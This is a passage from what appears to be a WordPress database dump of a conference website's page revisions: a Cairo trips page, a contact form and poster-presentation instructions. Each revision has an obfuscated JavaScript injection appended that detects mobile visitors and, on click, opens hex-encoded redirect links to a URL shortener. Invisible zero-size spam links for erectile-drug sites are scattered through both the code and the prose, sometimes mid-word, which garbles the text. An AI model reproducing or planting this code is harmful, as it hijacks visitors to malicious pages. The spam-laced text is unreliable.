_0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'147919<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisofr.com/\">犀利士</a>\n</span>2fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagraseo.com/\">威而鋼</a>\n</span>2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fun Trips in Cairo','','inherit','closed','closed','','5430-revision-v1','','','2023-10-03 13:19:10','2023-10-03 13:19:10','',5430,'https://gsw2023.com/?p=5490',0,'revision','',0),
(5491,0,'2023-10-03 13:19:11','2023-10-03 13:19:11','[fluentform id=\"1\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismo.com/\">犀利士</a>\n</span>x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialiman.com/\">犀利士</a>\n</span>v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-10-03 13:19:11','2023-10-03 13:19:11','',5364,'https://gsw2023.com/?p=5491',0,'revision','',0),
(5492,0,'2023-10-03 13:19:11','2023-10-03 13:19:11','<span style=\"font-size: 12pt;\"><strong>Poster Design<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.curvbar.com/\">犀利士</a>\n</span> and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on ar<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>rival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v 